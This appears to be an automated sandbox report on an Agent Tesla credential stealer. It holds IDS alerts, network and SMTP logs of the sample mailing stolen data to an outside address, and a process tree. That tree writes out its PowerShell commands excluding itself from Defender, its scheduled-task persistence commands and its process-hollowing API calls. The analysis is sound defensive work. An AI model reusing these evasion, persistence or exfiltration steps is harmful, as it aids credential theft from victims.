                                            04/17/24-04:38:01.123740TCP2839723ETPRO TROJAN Win32/Agent Tesla SMTP Activity49704587192.168.2.5162.222.226.100
                                            04/17/24-04:38:01.123740TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49704587192.168.2.5162.222.226.100
                                            04/17/24-04:38:01.123740TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49704587192.168.2.5162.222.226.100
                                            04/17/24-04:38:03.579390TCP2855542ETPRO TROJAN Agent Tesla CnC Exfil Activity49705587192.168.2.5162.222.226.100
                                            04/17/24-04:38:03.579390TCP2855245ETPRO TROJAN Agent Tesla Exfil via SMTP49705587192.168.2.5162.222.226.100
                                            04/17/24-04:38:03.579390TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49705587192.168.2.5162.222.226.100
                                            04/17/24-04:38:03.579390TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249705587192.168.2.5162.222.226.100
                                            04/17/24-04:38:03.579390TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49705587192.168.2.5162.222.226.100
                                            04/17/24-04:38:01.123740TCP2855542ETPRO TROJAN Agent Tesla CnC Exfil Activity49704587192.168.2.5162.222.226.100
                                            04/17/24-04:38:01.123740TCP2855245ETPRO TROJAN Agent Tesla Exfil via SMTP49704587192.168.2.5162.222.226.100
                                            04/17/24-04:38:01.123740TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249704587192.168.2.5162.222.226.100
                                            04/17/24-04:38:03.579390TCP2839723ETPRO TROJAN Win32/Agent Tesla SMTP Activity49705587192.168.2.5162.222.226.100

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Apr 17, 2024 04:37:59.374211073 CEST49704587192.168.2.5162.222.226.100
                                            Apr 17, 2024 04:37:59.534440041 CEST58749704162.222.226.100192.168.2.5
                                            Apr 17, 2024 04:37:59.534585953 CEST49704587192.168.2.5162.222.226.100
                                            Apr 17, 2024 04:37:59.939888000 CEST58749704162.222.226.100192.168.2.5
                                            Apr 17, 2024 04:37:59.940562010 CEST49704587192.168.2.5162.222.226.100
                                            Apr 17, 2024 04:38:00.101069927 CEST58749704162.222.226.100192.168.2.5
                                            Apr 17, 2024 04:38:00.101912022 CEST49704587192.168.2.5162.222.226.100
                                            Apr 17, 2024 04:38:00.262630939 CEST58749704162.222.226.100192.168.2.5
                                            Apr 17, 2024 04:38:00.263658047 CEST49704587192.168.2.5162.222.226.100
                                            Apr 17, 2024 04:38:00.465681076 CEST58749704162.222.226.100192.168.2.5
                                            Apr 17, 2024 04:38:00.597055912 CEST58749704162.222.226.100192.168.2.5
                                            Apr 17, 2024 04:38:00.597325087 CEST49704587192.168.2.5162.222.226.100
                                            Apr 17, 2024 04:38:00.757306099 CEST58749704162.222.226.100192.168.2.5
                                            Apr 17, 2024 04:38:00.757345915 CEST58749704162.222.226.100192.168.2.5
                                            Apr 17, 2024 04:38:00.757498980 CEST49704587192.168.2.5162.222.226.100
                                            Apr 17, 2024 04:38:00.957664967 CEST58749704162.222.226.100192.168.2.5
                                            Apr 17, 2024 04:38:00.961685896 CEST58749704162.222.226.100192.168.2.5
                                            Apr 17, 2024 04:38:00.961954117 CEST49704587192.168.2.5162.222.226.100
                                            Apr 17, 2024 04:38:01.121985912 CEST58749704162.222.226.100192.168.2.5
                                            Apr 17, 2024 04:38:01.123025894 CEST58749704162.222.226.100192.168.2.5
                                            Apr 17, 2024 04:38:01.123739958 CEST49704587192.168.2.5162.222.226.100
                                            Apr 17, 2024 04:38:01.123739958 CEST49704587192.168.2.5162.222.226.100
                                            Apr 17, 2024 04:38:01.123740911 CEST49704587192.168.2.5162.222.226.100
                                            Apr 17, 2024 04:38:01.123740911 CEST49704587192.168.2.5162.222.226.100
                                            Apr 17, 2024 04:38:01.284351110 CEST58749704162.222.226.100192.168.2.5
                                            Apr 17, 2024 04:38:01.285629988 CEST58749704162.222.226.100192.168.2.5
                                            Apr 17, 2024 04:38:01.508708000 CEST49704587192.168.2.5162.222.226.100
                                            Apr 17, 2024 04:38:02.109441042 CEST49705587192.168.2.5162.222.226.100
                                            Apr 17, 2024 04:38:02.269932985 CEST58749705162.222.226.100192.168.2.5
                                            Apr 17, 2024 04:38:02.270245075 CEST49705587192.168.2.5162.222.226.100
                                            Apr 17, 2024 04:38:02.562134027 CEST58749705162.222.226.100192.168.2.5
                                            Apr 17, 2024 04:38:02.562906981 CEST49705587192.168.2.5162.222.226.100
                                            Apr 17, 2024 04:38:02.723295927 CEST58749705162.222.226.100192.168.2.5
                                            Apr 17, 2024 04:38:02.723593950 CEST49705587192.168.2.5162.222.226.100
                                            Apr 17, 2024 04:38:02.884491920 CEST58749705162.222.226.100192.168.2.5
                                            Apr 17, 2024 04:38:02.884865046 CEST49705587192.168.2.5162.222.226.100
                                            Apr 17, 2024 04:38:03.048023939 CEST58749705162.222.226.100192.168.2.5
                                            Apr 17, 2024 04:38:03.049336910 CEST49705587192.168.2.5162.222.226.100
                                            Apr 17, 2024 04:38:03.210295916 CEST58749705162.222.226.100192.168.2.5
                                            Apr 17, 2024 04:38:03.211163998 CEST49705587192.168.2.5162.222.226.100
                                            Apr 17, 2024 04:38:03.411901951 CEST58749705162.222.226.100192.168.2.5
                                            Apr 17, 2024 04:38:03.417901993 CEST58749705162.222.226.100192.168.2.5
                                            Apr 17, 2024 04:38:03.418256044 CEST49705587192.168.2.5162.222.226.100
                                            Apr 17, 2024 04:38:03.578634024 CEST58749705162.222.226.100192.168.2.5
                                            Apr 17, 2024 04:38:03.578695059 CEST58749705162.222.226.100192.168.2.5
                                            Apr 17, 2024 04:38:03.579390049 CEST49705587192.168.2.5162.222.226.100
                                            Apr 17, 2024 04:38:03.579390049 CEST49705587192.168.2.5162.222.226.100
                                            Apr 17, 2024 04:38:03.579587936 CEST49705587192.168.2.5162.222.226.100
                                            Apr 17, 2024 04:38:03.579587936 CEST49705587192.168.2.5162.222.226.100
                                            Apr 17, 2024 04:38:03.739731073 CEST58749705162.222.226.100192.168.2.5
                                            Apr 17, 2024 04:38:03.739788055 CEST58749705162.222.226.100192.168.2.5
                                            Apr 17, 2024 04:38:03.741247892 CEST58749705162.222.226.100192.168.2.5
                                            Apr 17, 2024 04:38:03.805576086 CEST49705587192.168.2.5162.222.226.100
                                            Apr 17, 2024 04:39:39.165086031 CEST49704587192.168.2.5162.222.226.100
                                            Apr 17, 2024 04:39:39.366795063 CEST58749704162.222.226.100192.168.2.5
                                            Apr 17, 2024 04:39:39.527962923 CEST58749704162.222.226.100192.168.2.5
                                            Apr 17, 2024 04:39:39.528060913 CEST49704587192.168.2.5162.222.226.100
                                            Apr 17, 2024 04:39:39.533641100 CEST49704587192.168.2.5162.222.226.100
                                            Apr 17, 2024 04:39:39.694139957 CEST58749704162.222.226.100192.168.2.5
                                            Apr 17, 2024 04:39:42.121665001 CEST49705587192.168.2.5162.222.226.100
                                            Apr 17, 2024 04:39:42.323091030 CEST58749705162.222.226.100192.168.2.5
                                            Apr 17, 2024 04:39:42.484003067 CEST58749705162.222.226.100192.168.2.5
                                            Apr 17, 2024 04:39:42.484087944 CEST49705587192.168.2.5162.222.226.100
                                            Apr 17, 2024 04:39:42.484195948 CEST49705587192.168.2.5162.222.226.100
                                            Apr 17, 2024 04:39:42.645159006 CEST58749705162.222.226.100192.168.2.5

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Apr 17, 2024 04:37:59.144567966 CEST6440053192.168.2.51.1.1.1
                                            Apr 17, 2024 04:37:59.367283106 CEST53644001.1.1.1192.168.2.5

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Apr 17, 2024 04:37:59.144567966 CEST192.168.2.51.1.1.10x1cafStandard query (0)mail.thelamalab.comA (IP address)IN (0x0001)false

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Apr 17, 2024 04:37:59.367283106 CEST1.1.1.1192.168.2.50x1cafNo error (0)mail.thelamalab.com162.222.226.100A (IP address)IN (0x0001)false

                                            SMTP Packets

                                            TimestampSource PortDest PortSource IPDest IPCommands
                                            Apr 17, 2024 04:37:59.939888000 CEST58749704162.222.226.100192.168.2.5220-md-114.webhostbox.net ESMTP Exim 4.96.2 #2 Wed, 17 Apr 2024 08:07:59 +0530
                                            220-We do not authorize the use of this system to transport unsolicited,
                                            220 and/or bulk e-mail.
                                            Apr 17, 2024 04:37:59.940562010 CEST49704587192.168.2.5162.222.226.100EHLO 888683
                                            Apr 17, 2024 04:38:00.101069927 CEST58749704162.222.226.100192.168.2.5250-md-114.webhostbox.net Hello 888683 [81.181.57.52]
                                            250-SIZE 52428800
                                            250-8BITMIME
                                            250-PIPELINING
                                            250-PIPECONNECT
                                            250-AUTH PLAIN LOGIN
                                            250-STARTTLS
                                            250 HELP
                                            Apr 17, 2024 04:38:00.101912022 CEST49704587192.168.2.5162.222.226.100AUTH login YmlsbGluZ0B0aGVsYW1hbGFiLmNvbQ==
                                            Apr 17, 2024 04:38:00.262630939 CEST58749704162.222.226.100192.168.2.5334 UGFzc3dvcmQ6
                                            Apr 17, 2024 04:38:00.597055912 CEST58749704162.222.226.100192.168.2.5235 Authentication succeeded
                                            Apr 17, 2024 04:38:00.597325087 CEST49704587192.168.2.5162.222.226.100MAIL FROM:<billing@thelamalab.com>
                                            Apr 17, 2024 04:38:00.757345915 CEST58749704162.222.226.100192.168.2.5250 OK
                                            Apr 17, 2024 04:38:00.757498980 CEST49704587192.168.2.5162.222.226.100RCPT TO:<jinhux31@gmail.com>
                                            Apr 17, 2024 04:38:00.961685896 CEST58749704162.222.226.100192.168.2.5250 Accepted
                                            Apr 17, 2024 04:38:00.961954117 CEST49704587192.168.2.5162.222.226.100DATA
                                            Apr 17, 2024 04:38:01.123025894 CEST58749704162.222.226.100192.168.2.5354 Enter message, ending with "." on a line by itself
                                            Apr 17, 2024 04:38:01.123740911 CEST49704587192.168.2.5162.222.226.100.
                                            Apr 17, 2024 04:38:01.285629988 CEST58749704162.222.226.100192.168.2.5250 OK id=1rwvBR-002odx-0A
                                            Apr 17, 2024 04:38:02.562134027 CEST58749705162.222.226.100192.168.2.5220-md-114.webhostbox.net ESMTP Exim 4.96.2 #2 Wed, 17 Apr 2024 08:08:02 +0530
                                            220-We do not authorize the use of this system to transport unsolicited,
                                            220 and/or bulk e-mail.
                                            Apr 17, 2024 04:38:02.562906981 CEST49705587192.168.2.5162.222.226.100EHLO 888683
                                            Apr 17, 2024 04:38:02.723295927 CEST58749705162.222.226.100192.168.2.5250-md-114.webhostbox.net Hello 888683 [81.181.57.52]
                                            250-SIZE 52428800
                                            250-8BITMIME
                                            250-PIPELINING
                                            250-PIPECONNECT
                                            250-AUTH PLAIN LOGIN
                                            250-STARTTLS
                                            250 HELP
                                            Apr 17, 2024 04:38:02.723593950 CEST49705587192.168.2.5162.222.226.100AUTH login YmlsbGluZ0B0aGVsYW1hbGFiLmNvbQ==
                                            Apr 17, 2024 04:38:02.884491920 CEST58749705162.222.226.100192.168.2.5334 UGFzc3dvcmQ6
                                            Apr 17, 2024 04:38:03.048023939 CEST58749705162.222.226.100192.168.2.5235 Authentication succeeded
                                            Apr 17, 2024 04:38:03.049336910 CEST49705587192.168.2.5162.222.226.100MAIL FROM:<billing@thelamalab.com>
                                            Apr 17, 2024 04:38:03.210295916 CEST58749705162.222.226.100192.168.2.5250 OK
                                            Apr 17, 2024 04:38:03.211163998 CEST49705587192.168.2.5162.222.226.100RCPT TO:<jinhux31@gmail.com>
                                            Apr 17, 2024 04:38:03.417901993 CEST58749705162.222.226.100192.168.2.5250 Accepted
                                            Apr 17, 2024 04:38:03.418256044 CEST49705587192.168.2.5162.222.226.100DATA
                                            Apr 17, 2024 04:38:03.578695059 CEST58749705162.222.226.100192.168.2.5354 Enter message, ending with "." on a line by itself
                                            Apr 17, 2024 04:38:03.579587936 CEST49705587192.168.2.5162.222.226.100.
                                            Apr 17, 2024 04:38:03.741247892 CEST58749705162.222.226.100192.168.2.5250 OK id=1rwvBT-002okS-1d
                                            Apr 17, 2024 04:39:39.165086031 CEST49704587192.168.2.5162.222.226.100QUIT
                                            Apr 17, 2024 04:39:39.527962923 CEST58749704162.222.226.100192.168.2.5221 md-114.webhostbox.net closing connection
                                            Apr 17, 2024 04:39:42.121665001 CEST49705587192.168.2.5162.222.226.100QUIT
                                            Apr 17, 2024 04:39:42.484003067 CEST58749705162.222.226.100192.168.2.5221 md-114.webhostbox.net closing connection

                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            High Level Behavior Distribution

                                            Click to dive into process behavior distribution

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Target ID:0
                                            Start time:04:37:54
                                            Start date:17/04/2024
                                            Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe"
                                            Imagebase:0x740000
                                            File size:702'976 bytes
                                            MD5 hash:78F627ADD2CCDD0F16400418E5F829B8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2025026137.0000000003CBE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2025026137.0000000003CBE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:2
                                            Start time:04:37:55
                                            Start date:17/04/2024
                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe"
                                            Imagebase:0x6d0000
                                            File size:433'152 bytes
                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:3
                                            Start time:04:37:55
                                            Start date:17/04/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6d64d0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:4
                                            Start time:04:37:55
                                            Start date:17/04/2024
                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TuZRpLi.exe"
                                            Imagebase:0x6d0000
                                            File size:433'152 bytes
                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:5
                                            Start time:04:37:56
                                            Start date:17/04/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6d64d0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:6
                                            Start time:04:37:56
                                            Start date:17/04/2024
                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TuZRpLi" /XML "C:\Users\user\AppData\Local\Temp\tmp8319.tmp"
                                            Imagebase:0x360000
                                            File size:187'904 bytes
                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:7
                                            Start time:04:37:56
                                            Start date:17/04/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6d64d0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:8
                                            Start time:04:37:56
                                            Start date:17/04/2024
                                            Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe"
                                            Imagebase:0xc0000
                                            File size:702'976 bytes
                                            MD5 hash:78F627ADD2CCDD0F16400418E5F829B8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:9
                                            Start time:04:37:56
                                            Start date:17/04/2024
                                            Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe"
                                            Imagebase:0xf30000
                                            File size:702'976 bytes
                                            MD5 hash:78F627ADD2CCDD0F16400418E5F829B8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.3258452239.00000000033B6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.3258452239.00000000033AE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.3255739299.0000000000434000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.3255739299.0000000000434000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.3258452239.0000000003361000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.3258452239.0000000003361000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:false

                                            General

                                            Target ID:10
                                            Start time:04:37:57
                                            Start date:17/04/2024
                                            Path:C:\Users\user\AppData\Roaming\TuZRpLi.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\AppData\Roaming\TuZRpLi.exe
                                            Imagebase:0x8b0000
                                            File size:702'976 bytes
                                            MD5 hash:78F627ADD2CCDD0F16400418E5F829B8
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Antivirus matches:
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 18%, ReversingLabs
                                            • Detection: 30%, Virustotal, Browse
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:11
                                            Start time:04:37:58
                                            Start date:17/04/2024
                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                            Imagebase:0x7ff6ef0c0000
                                            File size:496'640 bytes
                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                            Has elevated privileges:true
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:12
                                            Start time:04:37:59
                                            Start date:17/04/2024
                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TuZRpLi" /XML "C:\Users\user\AppData\Local\Temp\tmp9170.tmp"
                                            Imagebase:0x360000
                                            File size:187'904 bytes
                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:13
                                            Start time:04:37:59
                                            Start date:17/04/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6d64d0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:14
                                            Start time:04:37:59
                                            Start date:17/04/2024
                                            Path:C:\Users\user\AppData\Roaming\TuZRpLi.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Users\user\AppData\Roaming\TuZRpLi.exe"
                                            Imagebase:0x150000
                                            File size:702'976 bytes
                                            MD5 hash:78F627ADD2CCDD0F16400418E5F829B8
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:15
                                            Start time:04:37:59
                                            Start date:17/04/2024
                                            Path:C:\Users\user\AppData\Roaming\TuZRpLi.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Users\user\AppData\Roaming\TuZRpLi.exe"
                                            Imagebase:0x40000
                                            File size:702'976 bytes
                                            MD5 hash:78F627ADD2CCDD0F16400418E5F829B8
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:16
                                            Start time:04:38:00
                                            Start date:17/04/2024
                                            Path:C:\Users\user\AppData\Roaming\TuZRpLi.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Users\user\AppData\Roaming\TuZRpLi.exe"
                                            Imagebase:0x2e0000
                                            File size:702'976 bytes
                                            MD5 hash:78F627ADD2CCDD0F16400418E5F829B8
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:17
                                            Start time:04:38:00
                                            Start date:17/04/2024
                                            Path:C:\Users\user\AppData\Roaming\TuZRpLi.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\AppData\Roaming\TuZRpLi.exe"
                                            Imagebase:0x650000
                                            File size:702'976 bytes
                                            MD5 hash:78F627ADD2CCDD0F16400418E5F829B8
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000011.00000002.3259301451.0000000002D4E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000011.00000002.3259301451.0000000002D56000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.3259301451.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000011.00000002.3259301451.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:false

                                            Disassembly

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:11.1%
                                              Dynamic/Decrypted Code Coverage:99%
                                              Signature Coverage:0%
                                              Total number of Nodes:293
                                              Total number of Limit Nodes:9
                                              execution_graph 31227 5105010 31228 5105038 31227->31228 31230 5105060 31228->31230 31231 5104414 31228->31231 31230->31230 31232 510441f 31231->31232 31236 5106e60 31232->31236 31241 5106e48 31232->31241 31233 5105109 31233->31230 31237 5106e7a 31236->31237 31238 5106e9d 31237->31238 31246 5107cb8 31237->31246 31251 5107ca9 31237->31251 31238->31233 31243 5106e5a 31241->31243 31242 5106e9d 31242->31233 31243->31242 31244 5107cb8 CreateWindowExW 31243->31244 31245 5107ca9 CreateWindowExW 31243->31245 31244->31242 31245->31242 31247 5107ce3 31246->31247 31248 5107d92 31247->31248 31256 5108f70 31247->31256 31260 5108fa0 31247->31260 31252 5107cb8 31251->31252 31253 5107d92 31252->31253 31254 5108f70 CreateWindowExW 31252->31254 31255 5108fa0 CreateWindowExW 31252->31255 31254->31253 31255->31253 31257 5108f7d 31256->31257 31263 5108450 31257->31263 31261 5108fd5 31260->31261 31262 5108450 CreateWindowExW 31260->31262 31261->31248 31262->31261 31264 5108ff0 CreateWindowExW 31263->31264 31266 5109114 31264->31266 31267 5d0b890 31268 5d0ba1b 31267->31268 31270 5d0b8b6 31267->31270 31270->31268 31271 5d0875c 31270->31271 31272 5d0bb10 PostMessageW 31271->31272 31273 5d0bb7c 31272->31273 31273->31270 31432 5104820 31433 5104866 31432->31433 31434 5104953 31433->31434 31437 5104a00 31433->31437 31440 51049ef 31433->31440 31444 51043b0 31437->31444 31441 5104a00 31440->31441 31442 51043b0 DuplicateHandle 31441->31442 31443 5104a2e 31442->31443 31443->31434 31445 5104a68 DuplicateHandle 31444->31445 31446 5104a2e 31445->31446 31446->31434 31447 5d07ce0 31448 5d07c23 31447->31448 31449 5d07c38 31448->31449 31452 5d0a5e0 31448->31452 31469 5d0a620 31448->31469 31453 5d0a5ef 31452->31453 31461 5d0a642 31453->31461 31486 5d0ad98 31453->31486 31490 5d0b038 31453->31490 31495 5d0aab1 31453->31495 31500 5d0aeef 31453->31500 31509 5d0ac0e 31453->31509 31514 5d0ac6d 31453->31514 31519 5d0aa0c 31453->31519 31524 5d0accb 31453->31524 31529 5d0aa49 31453->31529 31534 5d0aea9 31453->31534 31538 5d0ad03 31453->31538 31542 5d0ab21 31453->31542 31547 5d0b09b 31453->31547 31552 5d0ae5a 31453->31552 31461->31449 31470 5d0a63a 31469->31470 31471 5d0a642 31470->31471 31472 5d0aab1 2 API calls 31470->31472 31473 5d0b038 2 API calls 31470->31473 31474 5d0ad98 2 API calls 31470->31474 31475 5d0ae5a 4 API calls 31470->31475 31476 5d0b09b 2 API calls 31470->31476 31477 5d0ab21 2 API calls 31470->31477 31478 5d0ad03 2 API calls 31470->31478 31479 5d0aea9 2 API calls 31470->31479 31480 5d0aa49 2 API calls 31470->31480 31481 5d0accb 2 API calls 31470->31481 31482 5d0aa0c 2 API calls 31470->31482 31483 5d0ac6d 2 API calls 31470->31483 31484 5d0ac0e 2 API calls 31470->31484 31485 5d0aeef 4 API calls 31470->31485 31471->31449 31472->31471 31473->31471 31474->31471 31475->31471 31476->31471 31477->31471 31478->31471 31479->31471 31480->31471 31481->31471 31482->31471 31483->31471 31484->31471 31485->31471 31560 5d07580 31486->31560 31564 5d07588 31486->31564 31487 5d0ab0d 31491 5d0b03e 31490->31491 31568 5d06f00 31491->31568 31572 5d06f08 31491->31572 31492 5d0b0d1 31492->31461 31496 5d0aab7 31495->31496 31576 5d07810 31496->31576 31580 5d07806 31496->31580 31501 5d0ae59 31500->31501 31503 5d0ae77 31500->31503 31584 5d073f0 31501->31584 31588 5d073e8 31501->31588 31502 5d0b2f1 31503->31502 31505 5d06f00 ResumeThread 31503->31505 31506 5d06f08 ResumeThread 31503->31506 31504 5d0b0d1 31504->31461 31505->31504 31506->31504 31510 5d0ac2b 31509->31510 31512 5d06f00 ResumeThread 31510->31512 31513 5d06f08 ResumeThread 31510->31513 31511 5d0b0d1 31511->31461 31512->31511 31513->31511 31515 5d0ac73 31514->31515 31592 5d07672 31515->31592 31596 5d07678 31515->31596 31516 5d0ac99 31516->31461 31520 5d0aa4a 31519->31520 31521 5d0aae8 31520->31521 31522 5d07810 CreateProcessA 31520->31522 31523 5d07806 CreateProcessA 31520->31523 31521->31461 31521->31521 31522->31521 31523->31521 31525 5d0af10 31524->31525 31600 5d074c0 31525->31600 31604 5d074c8 31525->31604 31526 5d0af31 31530 5d0aa54 31529->31530 31531 5d0aae8 31530->31531 31532 5d07810 CreateProcessA 31530->31532 31533 5d07806 CreateProcessA 31530->31533 31531->31461 31531->31531 31532->31531 31533->31531 31536 5d07580 WriteProcessMemory 31534->31536 31537 5d07588 WriteProcessMemory 31534->31537 31535 5d0aed0 31535->31461 31536->31535 31537->31535 31539 5d0b314 31538->31539 31540 5d073f0 Wow64SetThreadContext 31539->31540 31541 5d073e8 Wow64SetThreadContext 31539->31541 31540->31539 31541->31539 31543 5d0ab2f 31542->31543 31545 5d07580 